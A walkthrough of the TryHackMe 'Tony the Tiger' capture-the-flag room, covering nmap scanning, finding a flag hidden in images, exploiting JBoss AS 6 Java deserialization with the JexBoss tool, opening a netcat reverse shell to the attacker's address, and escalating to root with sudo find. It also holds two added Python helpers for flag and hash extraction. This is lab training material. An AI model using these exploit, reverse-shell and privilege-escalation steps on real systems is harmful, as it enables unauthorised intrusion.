TryHackMe "Tony the Tiger" No Metasploit Walkthrough

Tony the Tiger Walkthrough

No Metasploit Edition

Tony the Tiger is a Java Serialization challenge where I actually didn't need to get fancy in order to exploit the machine.  All this challenge required was reading, good scanning and enumeration, Google Fu, and falling back on a college course that covered some steganography concepts.  After completing the challenge I went through some of the other community guides listed in the course and found several different ways to accomplish this challenge, and I encourage you to check those out as well.  This challenge is a Free Room currently at https://tryhackme.com/room/tonythetiger.

Scanning

Once we've gotten our VPN set up we can begin scanning the machine.  As usual, I start with a basic nmap scan followed by a more specific nmap -A scan targeting the ports I've found.

nmap 10.10.115.125

nmap -A -p22,80,1090,1098,1099,4446,8009,8080,8083 10.10.115.125

As we can see, we have a lot going on.  Our first question in Task #3 is to describe the service running on Port 8080, and we see it is Apache Tomcat/Coyote JSP engine 1.1.  Our next question is the name of the front end, and that is JBoss.  Additionally, we have other web servers running, SSH, and a couple of other services we can look into if necessary.

Stego Challenge

We'll start by checking out the website, since the challenge tells us we need to find a flag somewhere on the page.  Checking out the blog, we are met with a message in bold that suggests if Tony takes a picture we must know it has deeper meaning.  So let's grab the images.

Blog page and images

Digging deep into a college course I took that had some stego in it, I remembered that you can sometimes find hidden information (or THM flags) using a simple text editor.  So I opened both images in Notepad++ and found the flag we were looking for.  Alternatively, you could use the strings command, followed by the image, to locate the flag as well (I tested this and can assure its validity).


Notepad++ flag location
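The strings approach above, written out as a small Python script that mimics the strings command and filters the printable runs for the THM{...} flag shape.  This is an added example, not code from the original post: the sample bytes are constructed, and the flag pattern is an assumption about the platform's flag format.

```python
import re
import sys
from typing import List

# Constructed sample: a fake JPEG-like byte string with a flag hidden among
# non-printable bytes. This is NOT the challenge's real image.
SAMPLE_IMAGE = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    b"\x03\x9a\x7f\x00\xfe\x12"
    b"Flag is THM{constructed_example_flag}"
    b"\x00\x11\x22\xff\xd9"
)

# Assumed flag shape for this platform; pass a different pattern for other rooms.
FLAG_PATTERN = r"THM\{[^}]*\}"


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Behave like `strings`: return every run of at least min_len printable
    ASCII bytes (0x20..0x7e), in file order."""
    runs = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in runs.finditer(data)]


def find_flags(data: bytes, flag_pattern: str = FLAG_PATTERN) -> List[str]:
    """Return all flag-shaped substrings found inside the printable runs."""
    flag_re = re.compile(flag_pattern)
    found: List[str] = []
    for run in extract_strings(data):
        found.extend(flag_re.findall(run))
    return found


def scan_file(path: str, flag_pattern: str = FLAG_PATTERN) -> List[str]:
    """Read an image (or any binary file) from disk and look for flags in it."""
    with open(path, "rb") as fh:
        return find_flags(fh.read(), flag_pattern)


if __name__ == "__main__":
    # With file paths on the command line, scan them; otherwise use the sample.
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(p, scan_file(p))
    else:
        for s in extract_strings(SAMPLE_IMAGE):
            print(s)
        print("flags:", find_flags(SAMPLE_IMAGE))
```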

Now that we have completed this side challenge, we can get on with enumerating the machine and hopefully exploiting it.

Enumeration

We can now get to work on gaining access to the target machine.  It's running Linux from the looks of our scans, and is running as a web server.  We've already checked out Port 80 briefly for the stego challenge, so let's move on to the other server.  We see 8080 is open and running Tomcat/Coyote JSP engine 1.1.  We can also tell from the -A scan that JBoss AS is the header for the page.  So let's check that out first.

JBoss AS page

We are met with a JBoss AS console, which we are able to explore a bit.  Clicking the Administrative console takes us to a login page that shows us that the version running is AS 6.

Login Page JBoss AS 6 Admin Console

Exploitation

Let's dig deeper into the console.  A Google search shows us that this version is definitely vulnerable to exploitation, and that a tool called JexBoss is available on GitHub.
JexBoss Java Deserialization Exploitation Tool on GitHub

We have found the GitHub page, and exploring this tool more, we see that it exploits vulnerabilities in Java Deserialization.  So let's change directories to where we save our tools, and then run the commands below (the developer really makes this easy for everyone).

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

Running these commands clones the repository, changes directories into it, pip installs the requirements, runs the help function for you to see, and then leaves the last line in the terminal for you to modify to the target IP address to exploit.  Change that to your target IP address, and press enter.  If you've done everything correctly it should look like the below.  If not, please go over your steps once again.

python jexboss.py -u 10.10.115.125:8080

JexBoss has finished running, and we see that it even gives us a limited-use command shell.  Reading the output, we see that we are the cmnatic user, running on Ubuntu 14.04, and that the shell allows us to easily create a reverse shell to our machine.  So let's do that.  We will need to open up a new terminal and start a Netcat listener, and then run one of the shell commands in the JexBoss tool.  With luck you should see a connection.  Note that below I used the bash version, which doesn't allow you to utilize sudo commands.  You will want to use a Python one-liner such as this: python -c 'import pty; pty.spawn("/bin/bash")' . I later ran the one-liner to get a better shell.
nc -nlvp 4444; jexremote=10.11.1.198:4444; upgrade with the Python one-liner

If everything worked correctly you should get a command shell in a terminal.  If things didn't work right, please go back and check that your IP address matches your tun0 interface, and that you noted the proper ports.   If we change directories to our home directory, we can see there are three users available.  Let's first check out our own. There isn't much to see except a text file that says Java is insecure and a headache to upgrade (Yep! We figured that out for you).  

Changing directories into the jboss user, we can see a note that provides us with a password to the jboss account.


cat note - password disclosure for user jboss


 Logged in to Jboss user

This is OK, and allows us to pivot to another user; however, it doesn't show us the flag we need for the challenge.  What will show us the flag is the command ls -la.  This lists all contents, even those that are hidden.  Doing this reveals the .jboss.txt file and the flag for the user.
ls -la; cat .jboss.txt 

So we have a user flag, and now we need root.  The first thing anyone should do when trying to escalate privileges on Linux is run sudo -l.  This lists any sudo permissions a user may have.  As we can see, jboss is allowed to run the "find" command as the root user.  So we need to research how we might be able to use the find command to elevate privileges.
find command privesc command; Courtesy andreafortuna.org

So we know that the find command can be used to elevate privileges, so let's give it a try.  Running the sudo find command below, we see that we can, in fact, get a root command line.  I then ran our Python one-liner from earlier to get a fully functional shell.
sudo find . -exec /bin/sh \; -quit

We are now the root user, and almost to the finish line.  We can move to the root user directory and find the root.txt flag.  

root user "flag"

We can see that this isn't a normal-looking THM flag.  But it might be something else.  Anytime I'm met with something that is encoded, I start with Base64 and work from there.  So Google "Base64 decoder", and paste your "flag" into the input.  With luck you should get some output.  Alternatively we can run base64 -d <<< 'base64valuehere' and get our output.
Base64 decoder

This looks like a hash.  We can do a couple of things.  The easiest is to run it through hash-identifier in Kali, which will return the hash type.  In this case, MD5.  We can go the long way and try using Hashcat to crack it, or we can use an online MD5 lookup ("decrypt") tool first to see if it finds a match.  In our case, doing this is successful.

 MD5 hash crack value
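The base64-decode, identify-the-hash, and lookup steps above, as an added Python example that is not part of the original walkthrough.  The root.txt-style value is constructed from a made-up word, and the wordlist check is an offline stand-in for the online MD5 lookup used above; both values are assumptions, not the challenge's own.

```python
import base64
import hashlib
import re
from typing import List, Optional, Tuple

# Constructed sample shaped like root.txt: base64 of an MD5 hex digest of a
# made-up word. Neither value comes from the challenge.
SAMPLE_WORD = "constructed"
SAMPLE_DIGEST = hashlib.md5(SAMPLE_WORD.encode()).hexdigest()
SAMPLE_ROOT_TXT = base64.b64encode(SAMPLE_DIGEST.encode()).decode() + "\n"

# Hex-digest lengths of common unsalted hashes (32 hex chars = MD5 here).
HEX_DIGEST_TYPES = {32: "MD5 (same length as MD4/NTLM)", 40: "SHA-1",
                    64: "SHA-256", 128: "SHA-512"}

def decode_base64(text: str) -> Optional[bytes]:
    """Strict base64 decode after stripping whitespace; None if not base64."""
    cleaned = "".join(text.split())
    try:
        return base64.b64decode(cleaned, validate=True)
    except ValueError:  # binascii.Error (bad alphabet/padding) subclasses ValueError
        return None

def identify_hex_digest(value: str) -> Optional[str]:
    """Classify a hex string by length, as hash-identifier does for simple cases."""
    value = value.strip()
    if not re.fullmatch(r"[0-9a-fA-F]+", value):
        return None
    return HEX_DIGEST_TYPES.get(len(value))

def decode_and_identify(text: str) -> Tuple[Optional[str], Optional[str]]:
    """Base64-decode a 'flag' and report what kind of hash the result looks like."""
    raw = decode_base64(text)
    if raw is None:
        return None, None
    decoded = raw.decode("ascii", "replace").strip()
    return decoded, identify_hex_digest(decoded)

def md5_wordlist_match(digest_hex: str, candidates: List[str]) -> Optional[str]:
    """Offline stand-in for the online MD5 lookup: the candidate whose MD5
    equals the digest, or None. Only works for an unsalted MD5 of a plain word."""
    target = digest_hex.strip().lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None
```

The same length table explains why hash-identifier can only say "MD5" and not rule out other 128-bit digests; the wordlist match is what confirms the guess.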

Copy your found value, paste it in the TryHackMe dashboard, and you're finished with the challenge!  Congratulations.

Final Thoughts

This was a great challenge, and really requires good enumeration and researching to find your path in.  There are naturally additional ways to complete the challenge, including using the tool that is provided in the challenge, however I chose not to go that route.  Good job cmnatic on a great challenge!
